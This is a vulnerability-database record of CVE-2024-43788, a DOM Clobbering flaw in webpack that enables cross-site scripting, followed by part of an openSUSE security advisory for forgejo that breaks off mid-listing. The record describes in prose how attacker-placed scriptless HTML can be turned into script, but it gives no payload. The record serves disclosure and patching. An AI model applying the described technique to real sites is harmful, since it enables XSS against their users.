cve-2024-43788
Vulnerability from cvelistv5
Published
2024-08-27 17:07
Modified
2025-01-09 17:41
Severity ?
EPSS score ?
Summary
Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| security-advisories@github.com | https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61 | Patch | |
| security-advisories@github.com | https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270 | ||
| security-advisories@github.com | https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986 | Exploit, Vendor Advisory | |
| security-advisories@github.com | https://research.securitum.com/xss-in-amp4email-dom-clobbering | Exploit, Third Party Advisory | |
| security-advisories@github.com | https://scnps.co/papers/sp23_domclob.pdf | Exploit, Mitigation, Technical Description, Third Party Advisory |
{ containers: { adp: [ { affected: [ { cpes: [ "cpe:2.3:a:webpack:webpack:*:*:*:*:*:*:*:*", ], defaultStatus: "unknown", product: "webpack", vendor: "webpack", versions: [ { lessThan: "5.94.0", status: "affected", version: "0", versionType: "custom", }, ], }, ], metrics: [ { other: { content: { id: "CVE-2024-43788", options: [ { Exploitation: "poc", }, { Automatable: "no", }, { "Technical Impact": "partial", }, ], role: "CISA Coordinator", timestamp: "2024-08-27T18:09:32.950161Z", version: "2.0.3", }, type: "ssvc", }, }, ], providerMetadata: { dateUpdated: "2025-01-09T17:41:35.616Z", orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0", shortName: "CISA-ADP", }, title: "CISA ADP Vulnrichment", }, ], cna: { affected: [ { product: "webpack", vendor: "webpack", versions: [ { status: "affected", version: ">= 5.0.0-alpha.0, < 5.94.0", }, ], }, ], descriptions: [ { lang: "en", value: "Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.", }, ], metrics: [ { cvssV3_1: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 6.4, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H", version: "3.1", }, }, ], problemTypes: [ { descriptions: [ { cweId: "CWE-79", description: "CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", lang: "en", type: "CWE", }, ], }, ], providerMetadata: { dateUpdated: "2024-09-03T14:51:39.140Z", orgId: "a0819718-46f1-4df5-94e2-005712e83aaa", shortName: "GitHub_M", }, references: [ { name: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", tags: [ "x_refsource_CONFIRM", ], url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { name: "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270", tags: [ "x_refsource_MISC", ], url: "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270", }, { name: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", tags: [ "x_refsource_MISC", ], url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { name: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", tags: [ "x_refsource_MISC", ], url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { name: "https://scnps.co/papers/sp23_domclob.pdf", tags: [ "x_refsource_MISC", ], url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], source: { advisory: "GHSA-4vvj-4cpr-p986", discovery: "UNKNOWN", }, title: "DOM Clobbering Gadget found in Webpack's AutoPublicPathRuntimeModule that leads to Cross-site Scripting (XSS)", }, }, cveMetadata: { assignerOrgId: "a0819718-46f1-4df5-94e2-005712e83aaa", assignerShortName: "GitHub_M", cveId: "CVE-2024-43788", datePublished: "2024-08-27T17:07:16.285Z", dateReserved: "2024-08-16T14:20:37.323Z", dateUpdated: "2025-01-09T17:41:35.616Z", state: "PUBLISHED", }, dataType: "CVE_RECORD", dataVersion: "5.1", "vulnerability-lookup:meta": { fkie_nvd: { configurations: "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:webpack.js:webpack:*:*:*:*:*:node.js:*:*\", \"versionEndExcluding\": \"5.94.0\", \"matchCriteriaId\": \"10BD162E-912D-4458-A67B-F7BC3602FDC5\"}]}]}]", descriptions: "[{\"lang\": \"en\", \"value\": \"Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.\"}, {\"lang\": \"es\", \"value\": \"Webpack es un paquete de m\\u00f3dulos. Su objetivo principal es agrupar archivos JavaScript para su uso en un navegador, pero tambi\\u00e9n es capaz de transformar, agrupar o empaquetar casi cualquier recurso o activo. Los desarrolladores del paquete web han descubierto una vulnerabilidad de DOM Clobbering en `AutoPublicPathRuntimeModule` de Webpack. El gadget DOM Clobbering en el m\\u00f3dulo puede conducir a cross site scripting (XSS) en p\\u00e1ginas web donde est\\u00e1n presentes elementos HTML controlados por atacantes sin secuencias de comandos (por ejemplo, una etiqueta `img` con un atributo `name` no desinfectado). Se ha observado una explotaci\\u00f3n de este dispositivo en el mundo real en Canvas LMS, lo que permite que se produzca un ataque XSS a trav\\u00e9s de un c\\u00f3digo javascript compilado por Webpack (la parte vulnerable es de Webpack). DOM Clobbering es un tipo de ataque de reutilizaci\\u00f3n de c\\u00f3digo en el que el atacante primero incrusta un fragmento de marcas HTML aparentemente benignas y sin script en la p\\u00e1gina web (por ejemplo, a trav\\u00e9s de una publicaci\\u00f3n o comentario) y aprovecha los gadgets (fragmentos de c\\u00f3digo js) que se encuentran en el c\\u00f3digo javascript existente para transformarlo en c\\u00f3digo ejecutable. Esta vulnerabilidad puede provocar cross site scripting (XSS) en sitios web que incluyen archivos generados por Webpack y permiten a los usuarios inyectar ciertas etiquetas HTML sin secuencias de comandos con nombres o atributos de identificaci\\u00f3n desinfectados incorrectamente. Este problema se solucion\\u00f3 en la versi\\u00f3n 5.94.0. Se recomienda a todos los usuarios que actualicen. No se conocen workarounds para este problema.\"}]", id: "CVE-2024-43788", lastModified: "2024-09-03T15:15:15.937", metrics: "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H\", \"baseScore\": 6.4, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 1.6, \"impactScore\": 4.7}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\", \"baseScore\": 6.1, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"LOW\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 2.7}]}", published: "2024-08-27T17:15:07.967", references: "[{\"url\": \"https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://research.securitum.com/xss-in-amp4email-dom-clobbering\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://scnps.co/papers/sp23_domclob.pdf\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Mitigation\", \"Technical Description\", \"Third Party Advisory\"]}]", sourceIdentifier: "security-advisories@github.com", vulnStatus: "Modified", weaknesses: "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-79\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-79\"}]}]", }, nvd: "{\"cve\":{\"id\":\"CVE-2024-43788\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-08-27T17:15:07.967\",\"lastModified\":\"2024-09-03T15:15:15.937\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.\"},{\"lang\":\"es\",\"value\":\"Webpack es un paquete de módulos. Su objetivo principal es agrupar archivos JavaScript para su uso en un navegador, pero también es capaz de transformar, agrupar o empaquetar casi cualquier recurso o activo. Los desarrolladores del paquete web han descubierto una vulnerabilidad de DOM Clobbering en `AutoPublicPathRuntimeModule` de Webpack. El gadget DOM Clobbering en el módulo puede conducir a cross site scripting (XSS) en páginas web donde están presentes elementos HTML controlados por atacantes sin secuencias de comandos (por ejemplo, una etiqueta `img` con un atributo `name` no desinfectado). Se ha observado una explotación de este dispositivo en el mundo real en Canvas LMS, lo que permite que se produzca un ataque XSS a través de un código javascript compilado por Webpack (la parte vulnerable es de Webpack). DOM Clobbering es un tipo de ataque de reutilización de código en el que el atacante primero incrusta un fragmento de marcas HTML aparentemente benignas y sin script en la página web (por ejemplo, a través de una publicación o comentario) y aprovecha los gadgets (fragmentos de código js) que se encuentran en el código javascript existente para transformarlo en código ejecutable. Esta vulnerabilidad puede provocar cross site scripting (XSS) en sitios web que incluyen archivos generados por Webpack y permiten a los usuarios inyectar ciertas etiquetas HTML sin secuencias de comandos con nombres o atributos de identificación desinfectados incorrectamente. Este problema se solucionó en la versión 5.94.0. Se recomienda a todos los usuarios que actualicen. No se conocen workarounds para este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H\",\"baseScore\":6.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.6,\"impactScore\":4.7},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:webpack.js:webpack:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"5.94.0\",\"matchCriteriaId\":\"10BD162E-912D-4458-A67B-F7BC3602FDC5\"}]}]}],\"references\":[{\"url\":\"https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://research.securitum.com/xss-in-amp4email-dom-clobbering\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://scnps.co/papers/sp23_domclob.pdf\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Technical Description\",\"Third Party Advisory\"]}]}}", vulnrichment: { containers: "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-43788\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-27T18:09:32.950161Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:webpack:webpack:*:*:*:*:*:*:*:*\"], \"vendor\": \"webpack\", \"product\": \"webpack\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"5.94.0\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-27T18:11:53.603Z\"}}], \"cna\": {\"title\": \"DOM Clobbering Gadget found in Webpack's AutoPublicPathRuntimeModule that leads to Cross-site Scripting (XSS)\", \"source\": {\"advisory\": \"GHSA-4vvj-4cpr-p986\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 6.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"webpack\", \"product\": \"webpack\", \"versions\": [{\"status\": \"affected\", \"version\": \">= 5.0.0-alpha.0, < 5.94.0\"}]}], \"references\": [{\"url\": \"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\", \"name\": \"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270\", \"name\": \"https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61\", \"name\": \"https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://research.securitum.com/xss-in-amp4email-dom-clobbering\", \"name\": \"https://research.securitum.com/xss-in-amp4email-dom-clobbering\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://scnps.co/papers/sp23_domclob.pdf\", \"name\": \"https://scnps.co/papers/sp23_domclob.pdf\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-09-03T14:51:39.140Z\"}}}", cveMetadata: "{\"cveId\": \"CVE-2024-43788\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-01-09T17:41:35.616Z\", \"dateReserved\": \"2024-08-16T14:20:37.323Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-08-27T17:07:16.285Z\", \"assignerShortName\": \"GitHub_M\"}", dataType: "CVE_RECORD", dataVersion: "5.1", }, }, }
opensuse-su-2024:14330-1
Vulnerability from csaf_opensuse
Published
2024-09-10 00:00
Modified
2024-09-10 00:00
Summary
forgejo-8.0.3-1.1 on GA media
Notes
Title of the patch
forgejo-8.0.3-1.1 on GA media
Description of the patch
These are all security issues fixed in the forgejo-8.0.3-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2024-14330
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "forgejo-8.0.3-1.1 on GA media", title: "Title of the patch", }, { category: "description", text: "These are all security issues fixed in the forgejo-8.0.3-1.1 package on the GA media of openSUSE Tumbleweed.", title: "Description of the patch", }, { category: "details", text: "openSUSE-Tumbleweed-2024-14330", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14330-1.json", }, { category: "self", summary: "SUSE CVE CVE-2024-43788 page", url: "https://www.suse.com/security/cve/CVE-2024-43788/", }, ], title: "forgejo-8.0.3-1.1 on GA media", tracking: { current_release_date: "2024-09-10T00:00:00Z", generator: { date: "2024-09-10T00:00:00Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2024:14330-1", initial_release_date: "2024-09-10T00:00:00Z", revision_history: [ { date: "2024-09-10T00:00:00Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "forgejo-8.0.3-1.1.aarch64", product: { name: "forgejo-8.0.3-1.1.aarch64", product_id: "forgejo-8.0.3-1.1.aarch64", }, }, { category: "product_version", name: "forgejo-apparmor-8.0.3-1.1.aarch64", product: { name: "forgejo-apparmor-8.0.3-1.1.aarch64", product_id: "forgejo-apparmor-8.0.3-1.1.aarch64", }, }, { category: "product_version", name: "forgejo-firewalld-8.0.3-1.1.aarch64", product: { name: "forgejo-firewalld-8.0.3-1.1.aarch64", product_id: "forgejo-firewalld-8.0.3-1.1.aarch64", }, }, { category: "product_version", name: "forgejo-selinux-8.0.3-1.1.aarch64", product: { name: "forgejo-selinux-8.0.3-1.1.aarch64", product_id: "forgejo-selinux-8.0.3-1.1.aarch64", }, }, ], category: "architecture", name: "aarch64", }, { branches: [ { category: "product_version", name: "forgejo-8.0.3-1.1.ppc64le", product: { name: "forgejo-8.0.3-1.1.ppc64le", product_id: "forgejo-8.0.3-1.1.ppc64le", }, }, { category: "product_version", name: "forgejo-apparmor-8.0.3-1.1.ppc64le", product: { name: "forgejo-apparmor-8.0.3-1.1.ppc64le", product_id: "forgejo-apparmor-8.0.3-1.1.ppc64le", }, }, { category: "product_version", name: "forgejo-firewalld-8.0.3-1.1.ppc64le", product: { name: "forgejo-firewalld-8.0.3-1.1.ppc64le", product_id: "forgejo-firewalld-8.0.3-1.1.ppc64le", }, }, { category: "product_version", name: "forgejo-selinux-8.0.3-1.1.ppc64le", product: { name: "forgejo-selinux-8.0.3-1.1.ppc64le", product_id: "forgejo-selinux-8.0.3-1.1.ppc64le", }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "forgejo-8.0.3-1.1.s390x", product: { name: "forgejo-8.0.3-1.1.s390x", product_id: "forgejo-8.0.3-1.1.s390x", }, }, { category: "product_version", name: "forgejo-apparmor-8.0.3-1.1.s390x", product: { name: "forgejo-apparmor-8.0.3-1.1.s390x", product_id: "forgejo-apparmor-8.0.3-1.1.s390x", }, }, { category: "product_version", name: "forgejo-firewalld-8.0.3-1.1.s390x", product: { name: "forgejo-firewalld-8.0.3-1.1.s390x", product_id: "forgejo-firewalld-8.0.3-1.1.s390x", }, }, { category: "product_version", name: "forgejo-selinux-8.0.3-1.1.s390x", product: { name: "forgejo-selinux-8.0.3-1.1.s390x", product_id: "forgejo-selinux-8.0.3-1.1.s390x", }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "forgejo-8.0.3-1.1.x86_64", product: { name: "forgejo-8.0.3-1.1.x86_64", product_id: "forgejo-8.0.3-1.1.x86_64", }, }, { category: "product_version", name: "forgejo-apparmor-8.0.3-1.1.x86_64", product: { name: "forgejo-apparmor-8.0.3-1.1.x86_64", product_id: "forgejo-apparmor-8.0.3-1.1.x86_64", }, }, { category: "product_version", name: "forgejo-firewalld-8.0.3-1.1.x86_64", product: { name: "forgejo-firewalld-8.0.3-1.1.x86_64", product_id: "forgejo-firewalld-8.0.3-1.1.x86_64", }, }, { category: "product_version", name: "forgejo-selinux-8.0.3-1.1.x86_64", product: { name: "forgejo-selinux-8.0.3-1.1.x86_64", product_id: "forgejo-selinux-8.0.3-1.1.x86_64", }, }, ], category: "architecture", name: "x86_64", }, { branches: [ { category: "product_name", name: "openSUSE Tumbleweed", product: { name: "openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed", product_identification_helper: { cpe: "cpe:/o:opensuse:tumbleweed", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "forgejo-8.0.3-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-8.0.3-1.1.aarch64", }, product_reference: "forgejo-8.0.3-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-8.0.3-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-8.0.3-1.1.ppc64le", }, product_reference: "forgejo-8.0.3-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-8.0.3-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-8.0.3-1.1.s390x", }, product_reference: "forgejo-8.0.3-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-8.0.3-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-8.0.3-1.1.x86_64", }, product_reference: "forgejo-8.0.3-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-apparmor-8.0.3-1.1.aarch64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.aarch64", }, product_reference: "forgejo-apparmor-8.0.3-1.1.aarch64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-apparmor-8.0.3-1.1.ppc64le as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.ppc64le", }, product_reference: "forgejo-apparmor-8.0.3-1.1.ppc64le", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-apparmor-8.0.3-1.1.s390x as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.s390x", }, product_reference: "forgejo-apparmor-8.0.3-1.1.s390x", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: "forgejo-apparmor-8.0.3-1.1.x86_64 as component of openSUSE Tumbleweed", product_id: "openSUSE Tumbleweed:forgejo-apparmor-8.0.3-1.1.x86_64", }, product_reference: "forgejo-apparmor-8.0.3-1.1.x86_64", relates_to_product_reference: "openSUSE Tumbleweed", }, { category: "default_component_of", full_product_name: { name: 